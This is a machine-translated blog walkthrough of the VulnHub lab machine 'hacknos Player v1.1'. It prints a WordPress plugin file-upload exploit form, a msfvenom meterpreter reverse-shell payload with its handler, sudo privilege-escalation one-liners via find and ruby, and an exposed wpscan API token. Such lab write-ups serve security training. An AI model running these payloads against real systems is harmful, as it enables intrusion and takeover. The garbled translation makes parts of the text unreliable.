当前位置:网站首页>Vulnhub target: hacknos_ PLAYER V1.1
Vulnhub target: hacknos_ PLAYER V1.1
2022-07-06 12:22:00 【lainwith】
Catalog
Introduce
series : hackNos( This series consists of 7 platform )
Release date :2020 year 04 month 10 Japan
difficulty : primary - intermediate
Flag : 1 individual , Root user's root.txt
Study :
- wordpress Security testing
- Remote code execution
- Privilege Promotion
Target address :https://www.vulnhub.com/entry/hacknos-player-v11,459/
information gathering
The host found
arp-scan The host found
about VulnHub For the target , appear “PCS Systemtechnik GmbH” It's the target .
Host information detection
- Open port detection :
nmap -p- 192.168.1.117
, Only open 80 and 3306 port ( Quickly confirm the open port )
- Further explore open port services :
nmap -p80,3306 -sV 192.168.1.117
- Use default NSE Script scan :
nmap -p3306 -sC 192.168.1.117
See that the database version is 5.5.5
Website detection
visit 80 port , There is no valuable information .
Directory scanning
gobuster dir -u http://192.168.1.117/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
Didn't find any valuable information , Change to the previous article HACLABS: NO_NAME Routine in ( Change to a big dictionary ) The way is still invalid . Wood solution , Look back at the homepage of the website , Can you see anything valuable . Found a website directory :“[email protected]”
Due to the need to load google Site api, The opening speed is slightly slow . After waiting patiently for a while, I saw the following website . Through the plug-in, you know that the website is WordPress 5.3.11
wpscan List the user name of the site 、 account number
wpscan --url http://192.168.1.117/[email protected] -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
Found a message
Open the web site , This should be a password :[email protected]!!
Try to log in to the website , Failure
wpscan Missed scanning website
wpscan --url http://192.168.1.117/[email protected]/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
Remote Code Execution Vulnerability found !
Open according to the website provided , See the utilization code
Copy down , Yes url The address is slightly modified , obtain :
<form method="post" enctype="multipart/form-data" action="http://192.168.1.117/[email protected]/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
After doing this, an uploaded file can be accessed at, say:
http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml
Save it as a local html file , Then open it with a browser , Here's the picture , It's a file upload
That's easy to say , In a word, the Trojan horse is coming
Getshell
because webshell Manage the font size of the tool 、 The background color is not convenient for screenshot display , So I still use msf To do it .
- msf Get ready
Create a back door
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php
Turn on monitoring
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit
- Delivery back door , failed
See the hint , File format does not support ! I'm really careless , Looking back, I learned from the vulnerability verification website , The cause of the vulnerability is the use of switch case Simply matching the suffix of the blacklist results in bypassing , Vulnerability verification website suggests that we use .phtml
Suffix bypass
- Modify the suffix of the back door to
.phtml
, Re deliver the document
- Access back door
According to the use code , The uploaded file is in :http://example.com/wp-content/uploads/wpsp
- obtain shell
Click on the file , obtain shell
Raise the right
Use... In the front wpscan Got the code :**[email protected]!! **, Try... In turn , That is the **security ** User
Found a sensitive file , Temporarily without access
sudo Raise the right
- for the first time sudo Raise the right
The prompt can be sent by the user hacknos
Conduct find
Raise the right , And there is only hackNos-boat、hunter、security Three users , So the users here hacknos
It should mean hackNos-boat
Here's the picture , Switching users hacknos
Failure , Switch hackNos-boat
success
Through the website https://gtfobins.github.io/gtfobins/find/ Get the power raising order :
sudo -u hackNos-boat find . -exec /bin/bash \; -quit
- The second time sudo Raise the right
Continue to try to sudo Raise the right , Find out ruby Raise the right , Through the website https://gtfobins.github.io/gtfobins/ruby/ Know the order of raising rights :
sudo -u hunter ruby -e 'exec "/bin/sh"'
- third time sudo Raise the right
Get all Flag
边栏推荐
- Common DOS commands
- open-mmlab labelImg mmdetection
- The first simple case of GNN: Cora classification
- [899]有序队列
- 记一次云服务器被密码爆破的经历——关小黑屋、改密码、改端口
- Arm pc=pc+8 is the most understandable explanation
- Detailed explanation of truncate usage
- Redis based distributed locks and ultra detailed improvement ideas
- Postman 中级使用教程【环境变量、测试脚本、断言、接口文档等】
- Kconfig Kbuild
猜你喜欢
Detailed explanation of Union [C language]
MySQL時間、時區、自動填充0的問題
Fashion Gen: the general fashion dataset and challenge paper interpretation & dataset introduction
(一)R语言入门指南——数据分析的第一步
open-mmlab labelImg mmdetection
单片机蓝牙无线烧录
js 变量作用域和函数的学习笔记
Several declarations about pointers [C language]
Problèmes avec MySQL time, fuseau horaire, remplissage automatique 0
單片機藍牙無線燒錄
随机推荐
基于Redis的分布式锁 以及 超详细的改进思路
程序员老鸟都会搞错的问题 C语言基础 指针和数组
Comparison of solutions of Qualcomm & MTK & Kirin mobile platform USB3.0
NRF24L01故障排查
Arm pc=pc+8 is the most understandable explanation
Learning notes of JS variable scope and function
ES6 grammar summary -- Part I (basic)
Kaggle competition two Sigma connect: rental listing inquiries
编译原理:源程序的预处理及词法分析程序的设计与实现(含代码)
Minio文件下载问题——inputstream:closed
level16
open-mmlab labelImg mmdetection
Imgcat usage experience
Detailed explanation of truncate usage
ES6 grammar summary -- Part 2 (advanced part es6~es11)
imgcat使用心得
MySQL takes up too much memory solution
Intermediate use tutorial of postman [environment variables, test scripts, assertions, interface documents, etc.]
js题目:输入数组,最大的与第一个元素交换,最小的与最后一个元素交换,输出数组。
Knowledge summary of request